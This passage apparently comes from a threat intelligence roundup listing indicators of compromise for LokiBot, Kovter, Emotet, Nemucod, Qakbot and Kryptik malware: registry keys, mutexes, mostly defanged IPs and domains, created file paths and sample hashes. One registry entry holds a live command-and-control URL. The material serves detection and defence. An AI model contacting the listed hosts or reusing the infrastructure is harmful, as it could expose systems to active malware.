9484de151f507a81bb04f24b8bccbe4a63bfe0a1df7ea40ba5a076a52599af63
a233e5ce1fc0df70599f3fe8de20d512aac0b59d9d99df58894a34bba89ec81f
a969c6228f0de0426084c36c27615dbfa864c71a61c7c4f413fd862fc821db95
c71a6c05644b6fa09da4dc8c8d808bc7b0eaa3cac989d5f414cbbb79abea9b37
c916075ef74d579828ecb7fb1805076ac3929daac5b43b3c9d22c36d2239cbba
d8b92e14d57fb295a1102e9e89c2bdee0e332d87a003d3721b76e1e9eeaa7eb5
d9b94599e186e1c3a2507f1672a4a1b9492b4eb3c1a3547b3498c54275306765

Coverage

Screenshots of Detection

ThreatGrid

Umbrella

Win.Dropper.LokiBot-6978650-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\WinRAR`	1
`<HKLM>\http://45.67.14.182/slk8/b/cat.php`	1
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 Value Name: F`	1
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 Value Name: F`	1
`<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC Value Name: F`	1
`<HKCU>\SOFTWARE\WINRAR Value Name: HWID`	1

Mutexes	Occurrences
`A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A`	6
`3749282D282E1E80C56CAE5A`	5
`\BaseNamedObjects\3BA87BBD1CC40F3583D46680`	4
`\BaseNamedObjects\A238FB80-2231ABE6-BF235135-4DF622E2-F156829B3`	1
`\BaseNamedObjects\A238FB80-2231ABE6-BF235135-47749B25-DB14F8DE1`	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`185[.]79[.]156[.]24`	3
`185[.]79[.]156[.]18`	3
`185[.]79[.]156[.]23`	2
`45[.]67[.]14[.]182`	2

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
`%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol`	6
`%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol`	6
`%APPDATA%\D282E1\1E80C5.lck`	5
`%APPDATA%\wfsgsybinp\spflmbuwjdxpyke.exe`	5
`%TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll`	4
`%TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll`	4
`%TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll`	4
See JSON for more IOCs

File Hashes

1efb2130e792e899d3fee5b0582e61b54f9bdafd00ae43e727d618d462a64a42
316522e4f97f2d4f6d568093a043624cbb02d46eb5a7e0f6accfdb188cf1528f
319d22b549bcbabce103c5d1359ac65f8e8ae49bff6287de21f3f9ef3138646d
36ba85a2d278fb599de9dd36adbe289c39264055996b764d8979f45bcf123535
39b14c7b01c68dbd67963156b813ff89c3755b4f12643e6bc92f6ff4b14f40ee
680d1d8de9f13d9763a6bc8b2585840b70b7ca6c0f45470bed65f0ce5ca8f908
737b0f10471e7d73ec2227dba9250c5130f16b083bc34773e112d72ded4f9e8b
7ccb34bd9651f6f27d531128d839d8d0c1853f2b6f29fed69b7e19448bfd3024
8772387a55e177ff01fa20b6941dddde054c594eee8098cdf96a57e2ccb78b7d
8a4d4491deaea94a51586c5098055c335831b37c17f3d8449fba197dfe73a83d
98ece7de8b60e356d6a965c8fecc089b86e67e2c29faa941f7cae0a64537abb9
ba11b9b4c9e0084e5ae5d0de45761b6bd6ebbb62d41c93c7a23ceeda8461d4b1
bda55e17c599b80c688e93249375fb027754aef373ecf8a05f205f1ff4bbf21d
e650008c2c991f8064942ff5609617d07b4589d40a3e9e37c3c4885898f29f54
ea123c9b6299186b1319ec6572bd16fb6a28185f2e9ddb9aa1bf3e52f1911b5d
efa28604a547613b68480f7e8ac59f8d02931f5b8d4be6971ea96aff253d5d1a

Coverage

Screenshots of Detection

ThreatGrid

Win.Dropper.Kovter-6978831-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE Value Name: DisableOSUpgrade`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE Value Name: ReservationsAllowed`	25
`<HKLM>\SOFTWARE\WOW6432NODE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade`	25
`<HKCU>\SOFTWARE\3a91c13ab1`	25
`<HKLM>\SOFTWARE\WOW6432NODE\3a91c13ab1`	25
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: 656f27d6`	25
`<HKCU>\SOFTWARE\3A91C13AB1 Value Name: 656f27d6`	25
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: 96f717b3`	25
`<HKCU>\SOFTWARE\3A91C13AB1 Value Name: 96f717b3`	25
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: ffcfae7b`	25
`<HKCU>\SOFTWARE\3A91C13AB1 Value Name: ffcfae7b`	25
`<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 Value Name: 01b2a448`	20
`<HKCU>\SOFTWARE\3A91C13AB1 Value Name: 01b2a448`	20
`<HKLM>\SOFTWARE\WOW6432NODE\RDAW2P1XI Value Name: tnzJBB`	1
`<HKLM>\SOFTWARE\WOW6432NODE\XBZ0H3 Value Name: Emk9DIqKS`	1
`<HKLM>\SOFTWARE\WOW6432NODE\RDAW2P1XI Value Name: yw6yqsnsb`	1
`<HKLM>\SOFTWARE\WOW6432NODE\765B49A5A77BF31D`	1
`<HKLM>\SOFTWARE\WOW6432NODE\byvWyhji`	1
`<HKLM>\SOFTWARE\WOW6432NODE\765B49A5A77BF31D Value Name: D347D67C3DAC5505`	1
`<HKLM>\SOFTWARE\WOW6432NODE\BYVWYHJI Value Name: aL0JVbstG`	1
`<HKLM>\SOFTWARE\WOW6432NODE\BYVWYHJI Value Name: ESqO4Lrhe`	1
`<HKLM>\SOFTWARE\WOW6432NODE\062D56AB77939C4FB63`	1
`<HKLM>\SOFTWARE\WOW6432NODE\1ZBB6iJuv`	1

Mutexes	Occurrences
`B3E8F6F86CDD9D8B`	25
`A83BAA13F950654C`	25
`EA4EC370D1E573DA`	25
`Global\7A7146875A8CDE1E`	25
`\BaseNamedObjects\408D8D94EC4F66FC`	15
`\BaseNamedObjects\Global\350160F4882D1C98`	15
`\BaseNamedObjects\053C7D611BC8DF3A`	15

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`104[.]170[.]60[.]26`	1
`144[.]193[.]156[.]187`	1
`88[.]105[.]164[.]83`	1
`169[.]202[.]2[.]58`	1
`208[.]229[.]136[.]68`	1
`186[.]120[.]237[.]204`	1
`28[.]237[.]185[.]18`	1
`216[.]21[.]9[.]183`	1
`217[.]156[.]137[.]119`	1
`11[.]136[.]96[.]41`	1
`90[.]235[.]33[.]244`	1
`189[.]30[.]93[.]102`	1
`85[.]82[.]241[.]240`	1
`87[.]213[.]1[.]121`	1
`42[.]75[.]114[.]211`	1
`204[.]6[.]62[.]16`	1
`112[.]78[.]74[.]19`	1
`163[.]112[.]153[.]66`	1
`17[.]210[.]26[.]114`	1
`27[.]3[.]105[.]38`	1
`100[.]27[.]228[.]124`	1
`130[.]139[.]163[.]141`	1
`128[.]215[.]237[.]245`	1
`23[.]138[.]20[.]236`	1
`167[.]165[.]229[.]191`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`www[.]cloudflare[.]com`	1
`demo[.]wylynx[.]com`	1
`aviators-auth[.]coxhn[.]net`	1

Files and or directories created	Occurrences
`\InitShutdown`	18
`\winreg`	18
`%SystemRoot%\SysWOW64\tzres.dll`	1

File Hashes

0715f9f01ebbe56625dd3e970d7437d97564648e85990c9bdf142b4ecdaca3f1
07285e9593636743a333a3338ab93bf095fa0907451e471084cd609e7c938281
097d7d04e897eca987e28fa7f65a0c3ade12a71de1c758a9a4f5f925c5c602d8
0a297b9d84a638e994b2c7fec6df3b3847404731fb7c71562f1ccc0ae75506ab
0c8b9fa3bbdce9c015b000de00360c16203166088f2e7221af3e790e73095403
11bc7f1f1a3cda33e2f6240ab1e88e468c3a63e5ea3a329946992b737e296136
16e7c3a7b2a49e61db54ac870d796c37f9e671f64647887f1489ad3bd5ff626c
260572ea7138b64d15936143a9a547bab095151cc4d2ee8e2e9b7daf305fb2be
26f53bfdf087e36f3d13e5277b12e38ddb1b4989dd009f3f092d1954da0b8717
28766b46246a485e4c226ff90d93392cf2c706ed3bc60aa0d67fd2772130a985
2c32a26d84981b540b5fac0d466092c9a72c93723c2a36d643e6ff8cb8a8067d
2cfaede6d177df3e4eff37f5f99cb6a3353d76eac59a708f553abf8269dd2aca
30ae1dda31fe6473f13e54e01ad124ad3ea919ceaf196cb9f240ca1dfd79ed4a
3509a633922b3ede20640ffff30ffa13785f3972c4228bce33d631458825fe24
37bc5d2235c55b03d1b3270f88dac6f210400a192d85c85405593424af5c4c60
3a105a570eab21e12a4895a0ccf65b0d4b2bff313567e3e52119b1c14e8ea750
3c3166135909f4e982f313d6f28cbd44057f96a9ace0b1ffc9fd085d577fc4aa
3ea71c0fcc071c4eb5195f17a6b35156a5cc3602b2e1f5a6e90f9cb2ea315a07
3eb27755726ae476869cd8054527c1d0f6f49365c9efda8887013af895146c05
42561fe7ca1b2322cbe4d910d4c6d7d74a7089a33974a0bef7a45f7235267cd6
42ac2333962667d01a4296c64cfd907880c64dfbb9439a3a471f8080024e9d07
53dc0aee9d383c234bf9ffd2a49a25ae2affc2275b8806a72e343744f0a9e2ad
56ac99cd20dce48020e300dd3b46e9813552ad890b5e52e3d1c46247f6bb8cae
5700b5bfde766173f1dce5ccceb7ba015c22cb327f9591e700b8ebacfd158ed5
597f778320e6a1a30ab8905f7abdc796c490bd0a87f09c0a02f7849eb0b80585
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Doc.Downloader.Emotet-6978977-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: Type`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: Start`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ErrorControl`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ImagePath`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: DisplayName`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: WOW64`	38
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK Value Name: ObjectName`	38

Mutexes	Occurrences
`Global\I98B68E3C`	38
`Global\M98B68E3C`	38

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`115[.]71[.]233[.]127`	35
`74[.]207[.]227[.]96`	28
`23[.]95[.]95[.]18`	28
`172[.]217[.]6[.]211`	24
`65[.]55[.]72[.]183`	23
`74[.]6[.]136[.]150`	21
`69[.]147[.]92[.]11`	18
`74[.]6[.]141[.]50`	17
`212[.]77[.]101[.]141`	17
`69[.]147[.]92[.]12`	17
`196[.]25[.]211[.]150`	16
`212[.]227[.]17[.]168`	16
`212[.]77[.]101[.]1`	16
`172[.]217[.]12[.]211`	15
`159[.]127[.]187[.]12`	15
`173[.]194[.]207[.]108`	15
`72[.]167[.]238[.]29`	13
`104[.]131[.]11[.]150`	13
`64[.]91[.]228[.]45`	13
`200[.]27[.]156[.]230`	13
`64[.]4[.]244[.]68`	12
`200[.]27[.]156[.]160`	12
`207[.]204[.]50[.]10`	11
`68[.]178[.]213[.]203`	11
`213[.]165[.]67[.]108`	11
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`blog[.]laviajeria[.]com`	25
`smtp[.]aol[.]com`	17
`mail[.]wp[.]pl`	17
`smtp[.]wp[.]pl`	16
`mail[.]aol[.]com`	15
`mail[.]paypal[.]com`	15
`smtp[.]telkomsa[.]net`	14
`pop3[.]telkomsa[.]net`	13
`golfingtrail[.]com`	13
`smtpout[.]secureserver[.]net`	12
`smtp[.]mail[.]ru`	12
`mail[.]web[.]de`	12
`smtp[.]paypal[.]com`	12
`imap[.]secureserver[.]net`	11
`smtp[.]orange[.]fr`	11
`mail[.]secureserver[.]net`	10
`smtp[.]1und1[.]de`	10
`smtp[.]outlook[.]com`	9
`smtp[.]yahoo[.]co[.]uk`	9
`smtp[.]secureserver[.]net`	8
`mail[.]rochester[.]rr[.]com`	8
`mail[.]ccsu[.]edu`	8
`premium68[.]web-hosting[.]com`	8
`mail[.]gmx[.]de`	7
`mail[.]msn[.]com`	7
See JSON for more IOCs

Files and or directories created	Occurrences
`%HOMEPATH%\905.exe`	25
`%HOMEPATH%\985.exe`	13
`%SystemRoot%\Registration\R000000000005.clb`	1
`%SystemRoot%\SysWOW64\sourcebulka.exe`	1
`%SystemRoot%\SysWOW64\RaIsI.exe`	1
`%SystemRoot%\SysWOW64\b7CLyYeMYOz.exe`	1
`%SystemRoot%\SysWOW64\JAfDaABdFwDwQOmU.exe`	1
`%SystemRoot%\SysWOW64\XsURGMXS03AY8k5H.exe`	1
`%SystemRoot%\SysWOW64\B3G3HJkHw.exe`	1
`%SystemRoot%\SysWOW64\OACv5sbfWOqW.exe`	1
`%SystemRoot%\SysWOW64\vQPrd2DqNc.exe`	1
`%SystemRoot%\SysWOW64\eZctuX442LBnjCR.exe`	1
`%SystemRoot%\SysWOW64\G4gruKLDsT8Hqq.exe`	1
`%SystemRoot%\SysWOW64\H2TI.exe`	1
`%SystemRoot%\SysWOW64\0UiKEdt.exe`	1
`%SystemRoot%\SysWOW64\lI7hCDdPp88lp9wc9FI.exe`	1
`%SystemRoot%\SysWOW64\jvfRQuzTShGWsLy.exe`	1
`%SystemRoot%\SysWOW64\pFZeNxzUSolEMyg5jlf.exe`	1
`%TEMP%\CVR99F.tmp`	1
`%SystemRoot%\SysWOW64\s5nWep8.exe`	1
`%SystemRoot%\SysWOW64\OBG55Zcwc0ZIAIzMsrO.exe`	1
`%SystemRoot%\SysWOW64\rrLgU5ygLqi.exe`	1
`%SystemRoot%\SysWOW64\Bbnxe2ZT28fYyG.exe`	1
`%SystemRoot%\SysWOW64\4CrV663kwXBhNO.exe`	1
`%SystemRoot%\SysWOW64\rnrtEbeM2u.exe`	1
See JSON for more IOCs

File Hashes

08891649a39702f90e11f8ff3035fd16c8f2431d16eeb4919382414735a342be
10b5e211a2e7f00f87d2074a183f9870459e588772f2434ae2e597f800f8522a
173f2078c872504912c5878cac192ab6e7aee9da8f2b76505a7c201eec5af2f2
17dbcd96af456b87e928609743c3a232e438e3b7f31be3f82d9912605a17e7e5
1a1c4b3314857aed3c55053968fa6260693577ee18e59f29be78e9add0e52840
1afd12fda74676381f591b7e2dd6dd2510e603308504a73c880ab6990bd49d32
28398ed10fb49cc49f2cf4559ccbd2b5ce7213c0d62694dd637a5ec8d304352b
286d190e59b9fea171a55e2d99f2c4c5a66560c2e919199a67a6a960f5acd079
2875510d0044c059a8f554aa8401cacd69f806a46205632a11c02096ecb6a0e8
29a3ee36c05e27f07958695833e5f49f2579ce005fabd6048d74285b9dfc40e9
40abbe8ec1e3c31efdedfabaeadc4cdcb88e918f7a0ed7dd3092e26fb2dd676e
4e82b20ca98af17b4361fe688bce991cd907e25c139b9da39340fd758a6bd22b
4f65fb3713b36e2c0eb64e8e77a3aa6bd3e4367ffd3184b179da869ff094cacc
510f007b77f469f04508b716ab447ce6b2bdcb592aaf4854d236410e61009ee4
598ec9fc1bede336d31abbeaa17ee90fec033e46ca742d16e17b25efa2bfe8dc
5a217e950f27df7da794e729b22980c2aa1417696ffa1ee861ce9e657fd35bbb
5c0a12520509cc3dced61c92a635e06dc369f5fe537f6dd74cde28a383beaaf8
6850221b3ed9b438b4959fac2fa86ef2731267ecef2c539e128621a145f8f0b1
720d9323f66abad23ddc1a0274f13ada330575fa1566fc87c81faad0983b2a72
74b11951254ac75489460f573845fc5ddc84110b02585520cc175b02162c212e
74bf67c7c1ed3eafd43b099b40d537ea115190c49e4e3e956e42702ea9aa904b
7db9895829ef195f34659278d7f47618703cb2c535183f41dfc51a8263c7b4c5
83b3bc37bf99bc56096c76ecfd19cb34a70d0d9656f926598625417b5c425fc7
8691ab6505118b9ca2818db4e3ece4edcd40cedc4ba3b5a00dfbc7a1c12d58e6
86a50c8e8f5d300f3731ebdce8b98be02696e2ff1d7e979abd873354bfd87006
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Malware

Txt.Downloader.Nemucod-6979968-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\WOW6432NODE\System32`	18
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\Configuration`	18
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xi`	18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Client Server Runtime Subsystem`	18
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xVersion`	18
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xmode`	16
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xpk`	16
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xstate`	16
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xcnt`	16
`<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Value Name: Blob`	14
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: shst`	14
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: sh1`	14
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: xmail`	9
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION Value Name: shsnt`	9

Mutexes	Occurrences
N/A	-

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`194[.]109[.]206[.]212`	9
`95[.]216[.]12[.]141`	9
`104[.]18[.]35[.]131`	9
`104[.]16[.]154[.]36`	8
`104[.]16[.]155[.]36`	8
`86[.]59[.]21[.]38`	7
`104[.]18[.]34[.]131`	7
`208[.]83[.]223[.]34`	6
`154[.]35[.]32[.]5`	6
`171[.]25[.]193[.]9`	6
`128[.]31[.]0[.]39`	5
`193[.]23[.]244[.]244`	5
`76[.]73[.]17[.]194`	5
`62[.]173[.]145[.]104`	3
`85[.]93[.]145[.]251`	3
`131[.]188[.]40[.]189`	3
`138[.]201[.]169[.]12`	2
`78[.]129[.]150[.]54`	2
`82[.]192[.]94[.]125`	2
`134[.]19[.]177[.]109`	2
`109[.]234[.]165[.]77`	2
`173[.]254[.]213[.]13`	2
`94[.]73[.]147[.]165`	1
`148[.]251[.]155[.]108`	1
`212[.]237[.]210[.]8`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`whatismyipaddress[.]com`	16
`opengraphprotocol[.]org`	16
`wsrs[.]net`	16
`whatsmyip[.]net`	16
`aff[.]ironsocket[.]com`	16
`cmsgear[.]com`	16
`www[.]zagogulina[.]com`	2
`api[.]w[.]org`	1
`gmpg[.]org`	1
`t[.]co`	1
`www[.]lagerpartner[.]dk`	1
`adasnature[.]rodevdesign[.]com`	1
`toolingguru[.]com`	1
`specialsedu[.]com`	1
`tuttyguru[.]com`	1
`hoiquanarsenal[.]000webhostapp[.]com`	1
`stakesedu[.]com`	1
`techjoomo[.]com`	1
`tbuild[.]2tstelecom[.]com`	1
`fruityytech[.]com`	1
`techyoun[.]com`	1
`www[.]adasnature[.]rodevdesign[.]com`	1
`trutthedu[.]com`	1
`essexweldmex[.]com`	1
`ashleyharrison[.]tech`	1
See JSON for more IOCs

Files and or directories created	Occurrences
`%ProgramData%\Windows`	18
`%TEMP%\6893A5D897`	18
`%TEMP%\6893A5~1\lock`	18
`%ProgramData%\Windows\csrss.exe`	18
`%TEMP%\6893A5~1\state.tmp`	18
`%TEMP%\6893A5~1\unverified-microdesc-consensus.tmp`	18
`%TEMP%\6893A5~1\cached-certs.tmp`	17
`%TEMP%\6893A5~1\cached-microdesc-consensus.tmp`	17
`%TEMP%\6893A5~1\cached-microdescs.new`	17
`%TEMP%\6893A5~1\unverified-microdesc-consensus`	17
`E:\README10.txt`	16
`E:\README2.txt`	16
`E:\README5.txt`	16
`E:\README6.txt`	16
`E:\README7.txt`	16
`E:\README8.txt`	16
`E:\README9.txt`	16
`\README1.txt`	16
`\README10.txt`	16
`\README2.txt`	16
`\README3.txt`	16
`\README4.txt`	16
`\README5.txt`	16
`\README6.txt`	16
`\README7.txt`	16
See JSON for more IOCs

File Hashes

01446b1b8130f7e962e12ff9a50d5da8acb394be437f000d77f54e39527b7ab8
0aa15df3fca9a49cf616d6ee3dbc9d29fde8f272466788a217e15c28ec6ef3f5
19c6c4e0d94e88f3460549dca47715ba9f0f0e928f127eb45706c38d9979163b
1e91a7eb97063517cb8798dafe93fb2f20eec7f4100b4175ec26c7f975aa6965
1ed50005b56e0fd4828799e74bc5f78d2cc887934b891c23eb28d5b5cff14139
37134b5f952e7c0108685d16963663687637ec006a86a15feee1afca36e8b765
38be93101842cd74079121d4864d37f971cbad305c993ef2d465bb2bb6706d3d
43d78a497d4fc7a500e33d09bda1b93097727c703b7a0ed698bda3b417efd7c4
467be08133e9e2c683444bb21eef42864df9603cf22cde4ddf777a7d1c242362
47b28eea9dc3aea93a1c361b3e5db6d1cf88021225c43ba364f11959a834049e
54a6d6b359a4119a0009c2fec6f430a06df2aa6a0793b79feafe1a89b0e09010
640f7ee70f167a82e02a174c8f084ecec19b7a5481b6f7e399dfd25ad64f4da5
7b1d29992c3c9be33294af41981d48ba92a773f2d6bab6142d625aa5b7d96a7d
856b8aed7661ec632ccdba1e738e990703a53dd241c99a1627df99ad5bd3a478
869daf9d7e0ba9da47e604ca310022fa7aeb7a3a2ca7c1dc976958b634ab9cc5
94c3139cb64e42264c87afd46f879702b45c33e6711d1777a4ce3faa134faecf
986a7e2a2199640a2b156ad35a9313070bab0f89402bf9f6daff03c76748c76e
a3c8f9e92437fc83ad502f12eeb5aa97828b060168e50914aef6504961c82263
ab05542f803dfe04d1941ca646a3c9f10d04037475655bb1b9495dc82279fcd3
af66d0c9ab90be7dee01a389e351dc52a025be4579a7ef9cb290c4348c499cb6
be77578b063aeb67fa49b17d0474229e4573ab79e48d9d68e4250a063884d7c6
c22bb64479d12c5322e20c8cf88d7ddd68157d81b9211764a7f46e9096c56594
cf86b58dcc90b88df0f81d7e4db87e2c687baae11058924a74e91594ee8a0965
d6b029b0280f7c3e1a9be0dff1d9ce58e173b4fca568a80e62c69248398eed53
d93ad8604d87827ce1312c1640df2a49ba9f3c592ef9f779ae38eb76a9d95739
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Qakbot-6984556-0

Indicators of Compromise

Registry Keys	Occurrences
N/A	-

Mutexes	Occurrences
`ocmwn`	36

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
N/A	-

File Hashes

0416a1f1118ca4e50afdee9c1e76cdca0b19e374d2be21ed1ea6cf96eadc6033
0f70dc9c66a9bc37b7edfa1cb2d3566c53b63d67b8e8fd4c78f0f9ac08fc7a7b
0fbd8df6ea3398aa3c7a139679fe60ab90766a4dd81e3ae6feface7a24061b31
0fc09554d5f6f9059e6c251108caf5921db41ce23e791d418b4587108aae62db
122f88c01202cc59a9cbb11b8eff11e4b1ff98b8a9e7956db2c0161bd633e451
1df18b6c34f6eab5ba1de274793f94f6168016cfe00008db3a38d79031936b81
25194a4d3d7b860d1c2a722eeccd45d7c6bedb3fe2967e83bd28e9b3ea6bb033
2c738330714e592259d090d03400fa3cc4f2ae7f16b2e3616a5b8bc16e29c72e
2de648c80d9122fc3081aabf4d6257e03fecb57d9fe6e1b98b4e79f28516b8a2
2f769a70e02699e161593dc619e354028e3f3b23ea76cb8b493ef68595bc2b67
3b24ecd81735aaa4c459aa8e5378595eb6bc043d607eeb90b56ba89a962f56a8
40a186d85f12a21d4b65650ab513e723d0ebac79256307b6772257d4d9364188
43b8424bdd21dfbfd81cfc4b2f31706f2bfd21c5d5dd99b17be2b78ceb3a98e2
47d0d80d31c6b02e009585b97702fac60a958c5443a07ac62a68ef24b39bfcf4
4a961cc37b6f6c9e650d4aefa99de46a564679783b5ebaf631b10ac0e891191d
4ac3ceb7094c7c2a5edd95bb21a5b87e6f644cb03b0b72bb9f436623ec2b11d1
4af9db7adad64a3ccffb37a051672cbd119524999968837300763d1f0143d218
4b1becbe4702e8e370a3c0ba0d1ae6c3b0794de26b1db1730c609d2675f7edbd
4c36e499054de9b6a674a54d809083b90ffef539a33f76ef49d7a1bfe89ddfd2
56d8a1d419389fc826ca627bd62b90d8c1c78c1de9c906d73cc2f9a90aace0a6
5931e1ea80e1b82dbf84db29d4bcdf01feecc7a0efb3fac05bc187abf29a588c
61e2e922cae2ebed761d7ebc4e43e48821097821213216a17ec7690325c18f6f
62679544133ce6ec6a09ac7b374cb3c51e82ad5486499467ad58b4115850f110
66ef03a7d4628f9c40801b5ffd192376dce602214947e29f32d676f908c41d18
70d91dbb7fb60dfcee3cfa585eed0efcdd25620bdb5ffffd8431e02876ee65dd
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Kryptik-6983260-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: drippt`	25

Mutexes	Occurrences
`3G1S91V5ZA5fB56W`	25
`8AZB70HDFK0WOZIZ`	25
`ATYNKAJP30Z9AQ`	25
`JKLSXX1ZA1QRLER`	25
`NHO9AZB7HDK0WAZMM`	25
`OMXBJSJ3WA1ZIN`	25
`PJOQT7WD1SAOM`	25
`PSHZ73VLLOAFB`	25
`VHO9AZB7HDK0WAZMM`	25
`VRK1AlIXBJDA5U3A`	25

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
N/A	-

Files and or directories created	Occurrences
N/A	-

File Hashes

037a8cc036ef9b395300b6e56deb931f411d1fb498aefa1417fc5905f5a355b7
0e699ed4adcd822951f647d9d34873eb45436d8e08f273c6edc271b3a28a63b3
1693124dbb76c552ea96d94aeb56bcf673b29a4207be877743bc8e5b7404a9c5
1c3eb8b78b435fb261296e5afe7eca9d2f898e75a953edad8eb4b8788875e5b6
1cc0c215b78bc42e9926e822e8b3c05fca8dddfa23e6cbd245087309a9ac114c
233dd554a6e99d66c3c5b03a60c25c5737b1da6a6fa13b3e594da1deb5c47dcd
337b52e708905c51d83d570edd07379322270d6ef25a981a801776b2e60cf82a
37ae2b35640423e3074277bf9c6f6e0f25d47251418b66ce9b37c76154164023
3d2017ed5b3f99c43cc17ea72e95a4209be22d7cd0ed8c6b9d43add50628d6cc
432ce20272510c1a6112aa246b0cb321976a299b054d2b82b94598ed59ee7f44
4ac6c836b35945108c53f863e441e659baaf099279f06e0aa01d41f1739a980d
4f2333d05cdb8293b85e64bbb891eb5a8ad1ab322babf8993b854e37135a8677
513171233ab20f2e5f474ec0e00498a7e800c8c6d31f575ace21677e9a834667
571cfa598f094ad73ff6237ae66c938cb2832bf04196442608107fc3b46a967f
59010e05103e93fcb5bd33a0f13b8780720ac23694a1d12e4a5d59e3e8aa0984
